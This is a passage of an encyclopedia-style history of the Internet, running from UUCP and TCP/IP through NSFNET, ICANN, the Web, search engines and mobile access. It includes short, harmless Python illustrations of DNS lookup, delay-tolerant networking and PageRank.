In 1979, two students at Duke University, Tom Truscott and Jim Ellis, came up with the idea of using simple Bourne shell scripts to transfer news and messages on a serial line UUCP connection with nearby University of North Carolina at Chapel Hill. Following public release of the software, the mesh of UUCP hosts forwarding on the Usenet news rapidly expanded. UUCPnet, as it would later be named, also created gateways and links between FidoNet and dial-up BBS hosts. UUCP networks spread quickly due to the lower costs involved, the ability to use existing leased lines, X.25 links or even ARPANET connections, and the lack of strict use policies compared to later networks like CSNET and BITNET (commercial organizations, who might provide bug fixes, were not excluded). All connects were local. By 1981 the number of UUCP hosts had grown to 550, nearly doubling to 940 in 1984. Sublink Network, operating since 1987 and officially founded in Italy in 1989, based its interconnectivity upon UUCP to redistribute mail and news group messages throughout its Italian nodes (about 100 at the time) owned both by private individuals and small companies. Sublink Network represented possibly one of the first examples of Internet technology spreading through popular diffusion.[23]

Merging the networks and creating the Internet (1973–90)

TCP/IP


Map of the TCP/IP test network in February 1982
With so many different network methods, something was needed to unify them. Robert E. Kahn of DARPA and ARPANET recruited Vinton Cerf of Stanford University to work with him on the problem. By 1973, they had worked out a fundamental reformulation, where the differences between network protocols were hidden by using a common internetwork protocol, and instead of the network being responsible for reliability, as in the ARPANET, the hosts became responsible. Cerf credits Hubert Zimmerman, Gerard LeLann and Louis Pouzin (designer of the CYCLADES network) with important work on this design.[24]
The specification of the resulting protocol, RFC 675 – Specification of Internet Transmission Control Program, by Vinton Cerf, Yogen Dalal and Carl Sunshine, Network Working Group, December 1974, contains the first attested use of the term internet, as a shorthand for internetworking; later RFCs repeat this use, so the word started out as an adjective rather than the noun it is today.

A Stanford Research Institute packet radio van, site of the first three-way internetworked transmission.
With the role of the network reduced to the bare minimum, it became possible to join almost any networks together, no matter what their characteristics were, thereby solving Kahn's initial problem. DARPA agreed to fund development of prototype software, and after several years of work, the first demonstration of a gateway between the Packet Radio network in the SF Bay area and the ARPANET was conducted by the Stanford Research Institute. On November 22, 1977 a three network demonstration was conducted including the ARPANET, the Packet Radio Network and the Atlantic Packet Satellite network.[25][26]
Stemming from the first specifications of TCP in 1974, TCP/IP emerged in mid-late 1978 in nearly final form. By 1981, the associated standards were published as RFCs 791, 792 and 793 and adopted for use. DARPA sponsored or encouraged the development of TCP/IP implementations for many operating systems and then scheduled a migration of all hosts on all of its packet networks to TCP/IP. On January 1, 1983, known as flag day, TCP/IP protocols became the only approved protocol on the ARPANET, replacing the earlier NCP protocol.[27]

ARPANET to the federal wide area networks: MILNET, NSI, ESNet, CSNET, and NSFNET


BBN Technologies TCP/IP internet map early 1986
After the ARPANET had been up and running for several years, ARPA looked for another agency to hand off the network to; ARPA's primary mission was funding cutting edge research and development, not running a communications utility. Eventually, in July 1975, the network had been turned over to the Defense Communications Agency, also part of the Department of Defense. In 1983, the U.S. military portion of the ARPANET was broken off as a separate network, the MILNET. MILNET subsequently became the unclassified but military-only NIPRNET, in parallel with the SECRET-level SIPRNET and JWICS for TOP SECRET and above. NIPRNET does have controlled security gateways to the public Internet.
The networks based on the ARPANET were government funded and therefore restricted to noncommercial uses such as research; unrelated commercial use was strictly forbidden. This initially restricted connections to military sites and universities. During the 1980s, the connections expanded to more educational institutions, and even to a growing number of companies such as Digital Equipment Corporation and Hewlett-Packard, which were participating in research projects or providing services to those who were.
Several other branches of the U.S. government, the National Aeronautics and Space Agency (NASA), the National Science Foundation (NSF), and the Department of Energy (DOE) became heavily involved in Internet research and started development of a successor to ARPANET. In the mid 1980s, all three of these branches developed the first Wide Area Networks based on TCP/IP. NASA developed the NASA Science Network, NSF developed CSNET and DOE evolved the Energy Sciences Network or ESNet.

T3 NSFNET Backbone, c. 1992
NASA developed the TCP/IP based NASA Science Network (NSN) in the mid 1980s, connecting space scientists to data and information stored anywhere in the world. In 1989, the DECnet-based Space Physics Analysis Network (SPAN) and the TCP/IP-based NASA Science Network (NSN) were brought together at NASA Ames Research Center creating the first multiprotocol wide area network called the NASA Science Internet, or NSI. NSI was established to provide a totally integrated communications infrastructure to the NASA scientific community for the advancement of earth, space and life sciences. As a high-speed, multiprotocol, international network, NSI provided connectivity to over 20,000 scientists across all seven continents.

In 1981 NSF supported the development of the Computer Science Network (CSNET). CSNET connected with ARPANET using TCP/IP, and ran TCP/IP over X.25, but it also supported departments without sophisticated network connections, using automated dial-up mail exchange. Its experience with CSNET led NSF to use TCP/IP when it created NSFNET, a 56 kbit/s backbone established in 1986, that connected the NSF supported supercomputing centers and regional research and education networks in the United States.[28] However, use of NSFNET was not limited to supercomputer users and the 56 kbit/s network quickly became overloaded. NSFNET was upgraded to 1.5 Mbit/s in 1988. The existence of NSFNET and the creation of Federal Internet Exchanges (FIXes) allowed the ARPANET to be decommissioned in 1990. NSFNET was expanded and upgraded to 45 Mbit/s in 1991, and was decommissioned in 1995 when it was replaced by backbones operated by several commercial Internet Service Providers.

Transition towards the Internet

The term "internet" was adopted in the first RFC published on the TCP protocol (RFC 675:[29] Internet Transmission Control Program, December 1974) as an abbreviation of the term internetworking and the two terms were used interchangeably. In general, an internet was any network using TCP/IP. It was around the time when ARPANET was interlinked with NSFNET in the late 1980s, that the term was used as the name of the network, Internet,[30] being a large and global TCP/IP network.
As interest in widespread networking grew and new applications for it were developed, the Internet's technologies spread throughout the rest of the world. The network-agnostic approach in TCP/IP meant that it was easy to use any existing network infrastructure, such as the IPSS X.25 network, to carry Internet traffic. In 1984, University College London replaced its transatlantic satellite links with TCP/IP over IPSS.[31]
Many sites unable to link directly to the Internet started to create simple gateways to allow transfer of e-mail, at that time the most important application. Sites which only had intermittent connections used UUCP or FidoNet and relied on the gateways between these networks and the Internet. Some gateway services went beyond simple email peering, such as allowing access to FTP sites via UUCP or e-mail.
Finally, the Internet's remaining centralized routing aspects were removed. The EGP routing protocol was replaced by a new protocol, the Border Gateway Protocol (BGP). This turned the Internet into a meshed topology and moved away from the centric architecture which ARPANET had emphasized. In 1994, Classless Inter-Domain Routing was introduced to support better conservation of address space which allowed use of route aggregation to decrease the size of routing tables.[32]

TCP/IP goes global (1989–2000)

CERN, the European Internet, the link to the Pacific and beyond

Between 1984 and 1988 CERN began installation and operation of TCP/IP to interconnect its major internal computer systems, workstations, PCs and an accelerator control system. CERN continued to operate a limited self-developed system CERNET internally and several incompatible (typically proprietary) network protocols externally. There was considerable resistance in Europe towards more widespread use of TCP/IP and the CERN TCP/IP intranets remained isolated from the Internet until 1989.
In 1988 Daniel Karrenberg, from Centrum Wiskunde & Informatica (CWI) in Amsterdam, visited Ben Segal, CERN's TCP/IP Coordinator, looking for advice about the transition of the European side of the UUCP Usenet network (much of which ran over X.25 links) over to TCP/IP. In 1987, Ben Segal had met with Len Bosack from the then still small company Cisco about purchasing some TCP/IP routers for CERN, and was able to give Karrenberg advice and forward him on to Cisco for the appropriate hardware. This expanded the European portion of the Internet across the existing UUCP networks, and in 1989 CERN opened its first external TCP/IP connections.[33] This coincided with the creation of Réseaux IP Européens (RIPE), initially a group of IP network administrators who met regularly to carry out co-ordination work together. Later, in 1992, RIPE was formally registered as a cooperative in Amsterdam.
At the same time as the rise of internetworking in Europe, ad hoc networking to ARPA and in-between Australian universities formed, based on various technologies such as X.25 and UUCPNet. These were limited in their connection to the global networks, due to the cost of making individual international UUCP dial-up or X.25 connections. In 1989, Australian universities joined the push towards using IP protocols to unify their networking infrastructures. AARNet was formed in 1989 by the Australian Vice-Chancellors' Committee and provided a dedicated IP based network for Australia.
The Internet began to penetrate Asia in the late 1980s. Japan, which had built the UUCP-based network JUNET in 1984, connected to NSFNET in 1989. It hosted the annual meeting of the Internet Society, INET'92, in Kobe. Singapore developed TECHNET in 1990, and Thailand gained a global Internet connection between Chulalongkorn University and UUNET in 1992.[34]

Global digital divide

While developed countries with technological infrastructures were joining the Internet, developing countries began to experience a digital divide separating them from the Internet. On an essentially continental basis, they are building organizations for Internet resource administration and sharing operational experience, as more and more transmission facilities go into place.

Africa

At the beginning of the 1990s, African countries relied upon X.25 IPSS and 2400 baud modem UUCP links for international and internetwork computer communications.
In August 1995, InfoMail Uganda, Ltd., a privately held firm in Kampala now known as InfoCom, and NSN Network Services of Avon, Colorado, sold in 1997 and now known as Clear Channel Satellite, established Africa's first native TCP/IP high-speed satellite Internet services. The data connection was originally carried by a C-Band RSCC Russian satellite which connected InfoMail's Kampala offices directly to NSN's MAE-West point of presence using a private network from NSN's leased ground station in New Jersey. InfoCom's first satellite connection was just 64 kbit/s, serving a Sun host computer and twelve US Robotics dial-up modems.
In 1996 a USAID funded project, the Leland initiative, started work on developing full Internet connectivity for the continent. Guinea, Mozambique, Madagascar and Rwanda gained satellite earth stations in 1997, followed by Côte d'Ivoire and Benin in 1998.
Africa is building an Internet infrastructure. AfriNIC, headquartered in Mauritius, manages IP address allocation for the continent. As in the other Internet regions, there is an operational forum, the Internet Community of Operational Networking Specialists.[35]

There is a wide range of programs to provide high-performance transmission plant, and the western and southern coasts have undersea optical cable. High-speed cables join North Africa and the Horn of Africa to intercontinental cable systems. Undersea cable development is slower for East Africa; the original joint effort between the New Partnership for Africa's Development (NEPAD) and the East Africa Submarine System (Eassy) has broken off and may become two efforts.[36]

Asia and Oceania

The Asia Pacific Network Information Centre (APNIC), headquartered in Australia, manages IP address allocation for the region. APNIC sponsors an operational forum, the Asia-Pacific Regional Internet Conference on Operational Technologies (APRICOT).[37]
In 1991, the People's Republic of China saw its first TCP/IP college network, Tsinghua University's TUNET. The PRC went on to make its first global Internet connection in 1994, between the Beijing Electro-Spectrometer Collaboration and the Stanford Linear Accelerator Center. However, China went on to create its own digital divide by implementing a country-wide content filter.[38]

Latin America

As with the other regions, the Latin American and Caribbean Internet Addresses Registry (LACNIC) manages the IP address space and other resources for its area. LACNIC, headquartered in Uruguay, operates DNS root, reverse DNS, and other key services.

Opening the network to commerce

The interest in commercial use of the Internet became a hotly debated topic. Although commercial use was forbidden, the exact definition of commercial use could be unclear and subjective. UUCPNet and the X.25 IPSS had no such restrictions, which eventually led to the official barring of UUCPNet use of ARPANET and NSFNET connections. Some UUCP links nevertheless remained connected to these networks, as administrators turned a blind eye to their operation.
[Chart: World Internet Hosts, 1981–2011]
During the late 1980s, the first Internet service provider (ISP) companies were formed. Companies like PSINet, UUNET, Netcom, and Portal Software were formed to provide service to the regional research networks and provide alternate network access, UUCP-based email and Usenet News to the public. The first commercial dialup ISP in the United States was The World, opened in 1989.[39]
In 1992, Congress passed the Scientific and Advanced-Technology Act, 42 U.S.C. § 1862(g), which allowed NSF to support access by the research and education communities to computer networks which were not used exclusively for research and education purposes, thus permitting NSFNET to interconnect with commercial networks.[40][41] This caused controversy within the research and education community, who were concerned commercial use of the network might lead to an Internet that was less responsive to their needs, and within the community of commercial network providers, who felt that government subsidies were giving an unfair advantage to some organizations.[42]
By 1990, ARPANET had been overtaken and replaced by newer networking technologies and the project came to a close. New network service providers including PSINet, Alternet, CERFNet, ANS CO+RE, and many others were offering network access to commercial customers. NSFNET was no longer the de facto backbone and exchange point for the Internet. The Commercial Internet eXchange (CIX), Metropolitan Area Exchanges (MAEs), and later Network Access Points (NAPs) were becoming the primary interconnections between many networks. The final restrictions on carrying commercial traffic ended on April 30, 1995, when the National Science Foundation ended its sponsorship of the NSFNET Backbone Service and the service ended.[43][44] NSF provided initial support for the NAPs and interim support to help the regional research and education networks transition to commercial ISPs. NSF also sponsored the very high speed Backbone Network Service (vBNS), which continued to provide support for the supercomputing centers and research and education in the United States.[45]

Internet Engineering Task Force

The Internet Engineering Task Force (IETF) is a loosely self-organized group of volunteers who contribute to the engineering and evolution of Internet technologies. It is the principal body engaged in the development of new Internet standard specifications. Much of the IETF's work is done in Working Groups. It does not "run the Internet", despite what some people might mistakenly say. The IETF does make standards that are often adopted by Internet users, but it does not control, or even patrol, the Internet.[46][47]
The IETF started in January 1986 as a quarterly meeting of U.S. government-funded researchers. Non-government representatives were invited starting with the fourth IETF meeting in October 1986. The concept of Working Groups was introduced at the fifth IETF meeting in February 1987. The seventh IETF meeting in July 1987 was the first meeting with more than 100 attendees. In 1992, the Internet Society, a professional membership society, was formed and the IETF began to operate under it as an independent international standards body. The first IETF meeting outside of the United States was held in Amsterdam, The Netherlands, in July 1993. Today the IETF meets three times a year and attendance is often about 1,300 people, but has been as high as 2,000 on occasion. Typically one in three IETF meetings is held in Europe or Asia. The number of non-US attendees is roughly 50%, even at meetings held in the United States.[46]
The IETF is unusual in that it exists as a collection of happenings, but is not a corporation and has no board of directors, no members, and no dues. The closest thing there is to being an IETF member is being on the IETF or a Working Group mailing list. IETF volunteers come from all over the world and from many different parts of the Internet community. The IETF works closely with and under the supervision of the Internet Engineering Steering Group (IESG)[48] and the Internet Architecture Board (IAB).[49] The Internet Research Task Force (IRTF) and the Internet Research Steering Group (IRSG), peer activities to the IETF and IESG under the general supervision of the IAB, focus on longer term research issues.[50][46]

Request for Comments

Requests for Comments (RFCs) are the main documentation for the work of the IAB, IESG, IETF, and IRTF. RFC 1, "Host Software", was written by Steve Crocker at UCLA in April 1969, well before the IETF was created. Originally they were technical memos documenting aspects of ARPANET development and were edited by the late Jon Postel, the first RFC Editor.[46][51]
RFCs cover a wide range of information, from proposed standards, draft standards, full standards, and best practices to experimental protocols, history, and other informational topics.[52] RFCs can be written by individuals or informal groups of individuals, but many are the product of a more formal Working Group. Drafts are submitted to the IESG either by individuals or by the Working Group Chair. An RFC Editor, appointed by the IAB, separate from IANA, and working in conjunction with the IESG, receives drafts from the IESG and edits, formats, and publishes them. Once an RFC is published, it is never revised. If the standard it describes changes or its information becomes obsolete, the revised standard or updated information will be re-published as a new RFC that "obsoletes" the original.[46][51]

NIC, InterNIC, IANA and ICANN

The first central authority to coordinate the operation of the network was the Network Information Centre (NIC) at Stanford Research Institute (SRI) in Menlo Park, California. In 1972, management of these issues was given to the newly created Internet Assigned Numbers Authority (IANA). In addition to his role as the RFC Editor, Jon Postel worked as the manager of IANA until his death in 1998.
As the early ARPANET grew, hosts were referred to by names, and a HOSTS.TXT file would be distributed from SRI International to each host on the network. As the network grew, this became cumbersome. A technical solution came in the form of the Domain Name System, created by Paul Mockapetris. The Defense Data Network—Network Information Center (DDN-NIC) at SRI handled all registration services, including the top-level domains (TLDs) of .mil, .gov, .edu, .org, .net, .com and .us, root nameserver administration and Internet number assignments under a United States Department of Defense contract.[53] In 1991, the Defense Information Systems Agency (DISA) awarded the administration and maintenance of DDN-NIC (managed by SRI up until this point) to Government Systems, Inc., who subcontracted it to the small private-sector Network Solutions, Inc.[54][55]
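To make the contrast concrete, here is a minimal Python sketch of the two resolution styles described above: scanning a flat hosts file, as in the HOSTS.TXT days, versus asking the DNS resolver. This is only an illustration; the hosts-file path and the example hostname are assumptions, not part of the historical systems.

import socket

def lookup_hosts_file(name, path="/etc/hosts"):
    # HOSTS.TXT-style resolution: scan a flat file of "address name..." lines
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            parts = line.split()
            if name in parts[1:]:
                return parts[0]
    return None

def lookup_dns(name):
    # DNS-style resolution: delegate the query to the resolver/nameserver hierarchy
    return socket.gethostbyname(name)

print(lookup_hosts_file("localhost"))
print(lookup_dns("example.org"))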
Since at this point in history most of the growth on the Internet was coming from non-military sources, it was decided that the Department of Defense would no longer fund registration services outside of the .mil TLD. In 1993 the U.S. National Science Foundation, after a competitive bidding process in 1992, created the InterNIC to manage the allocations of addresses and management of the address databases, and awarded the contract to three organizations. Registration Services would be provided by Network Solutions; Directory and Database Services would be provided by AT&T; and Information Services would be provided by General Atomics.[56]
In 1998 both IANA and InterNIC were reorganized under the control of ICANN, a California non-profit corporation contracted by the United States Department of Commerce to manage a number of Internet-related tasks. The role of operating the DNS system was privatized and opened up to competition, while the central management of name allocations would be awarded on a contract tender basis.

Globalization and the 21st century

Since the 1990s, the Internet's governance and organization has been of global importance to commerce. The organizations which hold control of certain technical aspects of the Internet are both the successors of the old ARPANET oversight and the current decision-makers in the day-to-day technical aspects of the network. While formally recognized as the administrators of the network, their roles and their decisions are subject to international scrutiny and objections which limit them. These objections led ICANN to end its relationship with the University of Southern California in 2000,[57] and finally, in September 2009, to gain autonomy from the US government through the ending of its longstanding agreements, although some contractual obligations with the Department of Commerce continued until at least 2011.[58][59][60] How the history of the Internet plays out from here will in many ways be a consequence of the ICANN organization.
In its role of forming standards associated with the Internet, the IETF continues to serve as the ad-hoc standards group. It continues to issue Requests for Comments, numbered sequentially from RFC 1 of the ARPANET project. The IETF's precursor was the GADS Task Force, a group of US government-funded researchers in the 1980s. Many of the group's recent developments have been of global necessity, such as the i18n working groups that develop things like internationalized domain names. The Internet Society has helped to fund the IETF, providing limited oversight.

Futurology: Beyond Earth and TCP/IP (2010 to present)

The first live Internet link into low Earth orbit was established on January 22, 2010, when astronaut T. J. Creamer posted the first unassisted update to his Twitter account from the International Space Station, marking the extension of the Internet into space. (Astronauts at the ISS had used email and Twitter before, but these messages had been relayed to the ground through a NASA data link before being posted by a human proxy.) This personal Web access, which NASA calls the Crew Support LAN, uses the space station's high-speed Ku band microwave link. To surf the Web, astronauts can use a station laptop computer to control a desktop computer on Earth, and they can talk to their families and friends on Earth using Voice over IP equipment.[61]
Communication with spacecraft beyond Earth orbit has traditionally been over point-to-point links through the Deep Space Network. Each such data link must be manually scheduled and configured. In the late 1990s NASA and Google began working on a new network protocol, Delay-tolerant networking (DTN), which automates this process, allows networking of spaceborne transmission nodes, and takes into account the fact that spacecraft can temporarily lose contact because they move behind the Moon or planets, or because space "weather" disrupts the connection. Under such conditions, DTN retransmits data packets instead of dropping them, as the standard TCP/IP Internet protocols do. NASA conducted the first field test of what it calls the "deep space internet" in November 2008.[62] This network technology is intended to enable missions that involve multiple spacecraft where reliable inter-vessel communication might take precedence over vessel-to-Earth downlinks.
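As a rough illustration of that store-and-forward behaviour, the following Python fragment buffers packets while the link is down and retransmits them when contact resumes. It is a toy sketch only, not the actual Bundle Protocol or any NASA code; the class and method names are invented for the example.

from collections import deque

class StoreAndForwardNode:
    """Toy DTN-style node: hold data while out of contact, send it later."""

    def __init__(self):
        self.buffer = deque()

    def send(self, packet, link_up):
        if link_up:
            self.transmit(packet)
        else:
            # Unlike plain TCP/IP, the packet is stored rather than dropped
            self.buffer.append(packet)

    def contact_resumed(self):
        # Flush everything queued while the spacecraft was out of contact
        while self.buffer:
            self.transmit(self.buffer.popleft())

    def transmit(self, packet):
        print("transmitting", packet)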

Use and culture

E-mail and Usenet

E-mail is often called the killer application of the Internet. However, it actually predates the Internet and was a crucial tool in creating it. Email started in 1965 as a way for multiple users of a time-sharing mainframe computer to communicate. Although the history is unclear, among the first systems to have such a facility were SDC's Q32 and MIT's CTSS.[63]
The ARPANET computer network made a large contribution to the evolution of e-mail. There is one report[64] indicating experimental inter-system e-mail transfers on it shortly after ARPANET's creation. In 1971 Ray Tomlinson created what was to become the standard Internet e-mail address format, using the @ sign to separate user names from host names.[65]
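A tiny Python illustration of that user@host convention (the address below is invented for the example, not a historical one):

def parse_address(address):
    # user@host: everything after the last "@" names the host
    user, _, host = address.rpartition("@")
    return user, host

print(parse_address("user@example-host"))   # -> ('user', 'example-host')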
A number of protocols were developed to deliver e-mail among groups of time-sharing computers over alternative transmission systems, such as UUCP and IBM's VNET e-mail system. E-mail could be passed this way between a number of networks, including ARPANET, BITNET and NSFNET, as well as to hosts connected directly to other sites via UUCP. See the history of the SMTP protocol.
In addition, UUCP allowed the publication of text files that could be read by many others. The News software developed by Steve Daniel and Tom Truscott in 1979 was used to distribute news and bulletin board-like messages. This quickly grew into discussion groups, known as newsgroups, on a wide range of topics. On ARPANET and NSFNET similar discussion groups would form via mailing lists, discussing both technical issues and more culturally focused topics (such as science fiction, discussed on the sflovers mailing list).
During the early years of the Internet, e-mail and similar mechanisms were also fundamental in allowing people to access resources that were not available due to the absence of online connectivity. UUCP was often used to distribute files using the 'alt.binaries' groups. Also, FTP e-mail gateways allowed people who lived outside the US and Europe to download files using FTP commands written inside e-mail messages. The file was encoded, broken into pieces and sent by e-mail; the receiver had to reassemble and decode it later, and this was the only way for people living overseas to download items such as early Linux versions using the slow dial-up connections available at the time. After the popularization of the Web and the HTTP protocol, such tools were slowly abandoned.
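The following Python sketch gives the flavour of that encode, split and mail workflow. Real gateways of the era typically used uuencode rather than base64, and the chunk size and function names here are arbitrary assumptions for illustration:

import base64

CHUNK = 60_000  # assumed per-message size limit, purely illustrative

def split_for_mail(path):
    # Encode the binary file as mail-safe text and cut it into pieces
    with open(path, "rb") as f:
        encoded = base64.encodebytes(f.read())
    return [encoded[i:i + CHUNK] for i in range(0, len(encoded), CHUNK)]

def reassemble(parts, out_path):
    # The receiver concatenates the pieces and decodes the original file
    with open(out_path, "wb") as f:
        f.write(base64.decodebytes(b"".join(parts)))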

From gopher to the WWW

As the Internet grew through the 1980s and early 1990s, many people realized the increasing need to be able to find and organize files and information. Projects such as Gopher, WAIS, and the FTP Archive list attempted to create ways to organize distributed data. Unfortunately, these projects fell short in being able to accommodate all the existing data types and in being able to grow without bottlenecks.
One of the most promising user interface paradigms during this period was hypertext. The technology had been inspired by Vannevar Bush's "Memex"[66] and developed through Ted Nelson's research on Project Xanadu and Douglas Engelbart's research on NLS.[67] Many small self-contained hypertext systems had been created before, such as Apple Computer's HyperCard (1987). Gopher became the first commonly-used hypertext interface to the Internet. While Gopher menu items were examples of hypertext, they were not commonly perceived in that way.

[Photo: This NeXT Computer was used by Sir Tim Berners-Lee at CERN and became the world's first Web server.]
In 1989, while working at CERN, Tim Berners-Lee invented a network-based implementation of the hypertext concept. By releasing his invention to public use, he ensured the technology would become widespread.[68] For his work in developing the World Wide Web, Berners-Lee received the Millennium Technology Prize in 2004.[69] One early popular web browser, modeled after HyperCard, was ViolaWWW.
A potential turning point for the World Wide Web began with the introduction[70] of the Mosaic web browser[71] in 1993, a graphical browser developed by a team at the National Center for Supercomputing Applications at the University of Illinois at Urbana-Champaign (NCSA-UIUC), led by Marc Andreessen. Funding for Mosaic came from the High-Performance Computing and Communications Initiative, a funding program initiated by the High Performance Computing and Communication Act of 1991, also known as the Gore Bill.[72] Indeed, Mosaic's graphical interface soon became more popular than Gopher, which at the time was primarily text-based, and the WWW became the preferred interface for accessing the Internet. (Gore's reference to his role in "creating the Internet", however, was ridiculed during his presidential election campaign.)
Mosaic was eventually superseded in 1994 by Andreessen's Netscape Navigator, which replaced Mosaic as the world's most popular browser. While it held this title for some time, eventually competition from Internet Explorer and a variety of other browsers almost completely displaced it. Another important event held on January 11, 1994, was The Superhighway Summit at UCLA's Royce Hall. This was the "first public conference bringing together all of the major industry, government and academic leaders in the field [and] also began the national dialogue about the Information Superhighway and its implications."[73]
24 Hours in Cyberspace, "the largest one-day online event" (February 8, 1996) up to that date, took place on the then-active website, cyber24.com.[74][75] It was headed by photographer Rick Smolan.[76] A photographic exhibition was unveiled at the Smithsonian Institution's National Museum of American History on January 23, 1997, featuring 70 photos from the project.[77]

Search engines

Even before the World Wide Web, there were search engines that attempted to organize the Internet. The first of these was the Archie search engine from McGill University in 1990, followed in 1991 by WAIS and Gopher. All three of those systems predated the invention of the World Wide Web but all continued to index the Web and the rest of the Internet for several years after the Web appeared. There are still Gopher servers as of 2006, although there are a great many more web servers.
As the Web grew, search engines and Web directories were created to track pages on the Web and allow people to find things. The first full-text Web search engine was WebCrawler in 1994. Before WebCrawler, only Web page titles were searched. Another early search engine, Lycos, was created in 1993 as a university project and was the first to achieve commercial success. During the late 1990s, both Web directories and Web search engines were popular: Yahoo! (founded 1994) and AltaVista (founded 1995) were the respective industry leaders. By August 2001, the directory model had begun to give way to search engines, tracking the rise of Google (founded 1998), which had developed new approaches to relevancy ranking. Directory features, while still commonly available, became afterthoughts to search engines.
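To see what "full-text" indexing means in practice, here is a toy inverted index in Python. The documents and the whitespace tokenization are simplifications for illustration, not how WebCrawler actually worked:

from collections import defaultdict

def build_index(documents):
    # Map every word to the set of documents that contain it
    index = defaultdict(set)
    for doc_id, text in documents.items():
        for word in text.lower().split():
            index[word].add(doc_id)
    return index

docs = {"page1": "history of the Internet", "page2": "Internet search engines"}
print(build_index(docs)["internet"])   # -> {'page1', 'page2'}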
Database size, which had been a significant marketing feature through the early 2000s, was similarly displaced by emphasis on relevancy ranking, the methods by which search engines attempt to sort the best results first. Relevancy ranking first became a major issue circa 1996, when it became apparent that it was impractical to review full lists of results. Consequently, algorithms for relevancy ranking have continuously improved. Google's PageRank method for ordering the results has received the most press, but all major search engines continually refine their ranking methodologies with a view toward improving the ordering of results. As of 2006, search engine rankings are more important than ever, so much so that an industry has developed ("search engine optimizers", or "SEO") to help web-developers improve their search ranking, and an entire body of case law has developed around matters that affect search engine rankings, such as use of trademarks in metatags. The sale of search rankings by some search engines has also created controversy among librarians and consumer advocates.[78]
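As a rough sketch of the idea behind PageRank, the following is a toy power-iteration version; the damping factor and the three-page link graph are assumptions made for the example, not Google's production algorithm:

def pagerank(links, damping=0.85, iterations=50):
    # links maps each page to the list of pages it links to
    pages = list(links)
    rank = {p: 1.0 / len(pages) for p in pages}
    for _ in range(iterations):
        new_rank = {p: (1.0 - damping) / len(pages) for p in pages}
        for page, outgoing in links.items():
            targets = outgoing or pages        # dangling pages spread rank evenly
            share = damping * rank[page] / len(targets)
            for target in targets:
                new_rank[target] += share
        rank = new_rank
    return rank

print(pagerank({"a": ["b"], "b": ["a", "c"], "c": ["a"]}))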
On June 3, 2009, Microsoft launched its new search engine, Bing.[79] The following month Microsoft and Yahoo! announced a deal in which Bing would power Yahoo! Search.[80]

Dot-com bubble

Suddenly the low price of reaching millions worldwide, and the possibility of selling to or hearing from those people at the same moment when they were reached, promised to overturn established business dogma in advertising, mail-order sales, customer relationship management, and many more areas. The web was a new killer app—it could bring together unrelated buyers and sellers in seamless and low-cost ways. Visionaries around the world developed new business models, and ran to their nearest venture capitalist. While some of the new entrepreneurs had experience in business and economics, the majority were simply people with ideas, and did not manage the capital influx prudently. Additionally, many dot-com business plans were predicated on the assumption that by using the Internet, they would bypass the distribution channels of existing businesses and therefore not have to compete with them; when the established businesses with strong existing brands developed their own Internet presence, these hopes were shattered, and the newcomers were left attempting to break into markets dominated by larger, more established businesses. Many did not have the ability to do so.
The dot-com bubble burst in March 2000, with the technology-heavy NASDAQ Composite index peaking at 5,048.62 on March 10[81] (5,132.52 intraday), more than double its value just a year before. By 2001, the bubble's deflation was running at full speed. A majority of the dot-coms had ceased trading after having burnt through their venture capital and IPO capital, often without ever making a profit. Despite this, the Internet continues to grow, driven by commerce, ever greater amounts of online information and knowledge, and social networking.

Online population forecast

A study conducted by JupiterResearch anticipates that a 38 percent increase in the number of people with online access will mean that, by 2011, 22 percent of the Earth's population will surf the Internet regularly. The report says 1.1 billion people have regular Web access. For the study, JupiterResearch defined online users as people who regularly access the Internet from dedicated Internet-access devices, which exclude cellular telephones.[82]

Mobile phones and the Internet

The first mobile phone with Internet connectivity was the Nokia 9000 Communicator, launched in Finland in 1996. The viability of Internet access on mobile phones was limited until prices came down from that model's level and network providers started to develop systems and services conveniently accessible on phones. NTT DoCoMo in Japan launched the first mobile Internet service, i-mode, in 1999, and this is considered the birth of mobile phone Internet services. In 2001, Research In Motion launched the mobile phone e-mail system for its BlackBerry product in America. To make efficient use of the small screen, tiny keypad and one-handed operation typical of mobile phones, a specific document and networking model was created for mobile devices, the Wireless Application Protocol (WAP). Most mobile device Internet services operate using WAP. The growth of mobile phone services was initially a primarily Asian phenomenon, with Japan, South Korea and Taiwan all soon finding the majority of their Internet users accessing resources by phone rather than by PC. Developing countries followed, with India, South Africa, Kenya, the Philippines, and Pakistan all reporting that the majority of their domestic users accessed the Internet from a mobile phone rather than a PC. European and North American use of the Internet was influenced by a large installed base of personal computers, and the growth of mobile phone Internet access was more gradual, but had reached national penetration levels of 20–30% in most Western countries. The cross-over occurred in 2008, when more Internet access devices were mobile phones than personal computers. In many parts of the developing world, the ratio is as much as 10 mobile phone users to one PC user.[83]

Historiography

Some concerns have been raised over the historiography of the Internet's development. Specifically, it is hard to find documentation of much of the Internet's development, for several reasons, including a lack of centralized records for much of the early work that led to the Internet.
"The Arpanet period is somewhat well documented because the corporation in charge – BBN – left a physical record. Moving into the NSFNET era, it became an extraordinarily decentralized process. The record exists in people's basements, in closets. [...] So much of what happened was done verbally and on the basis of individual trust."
Doug Gale (2007), [84]
[Photo: Tim Berners-Lee, August 1996]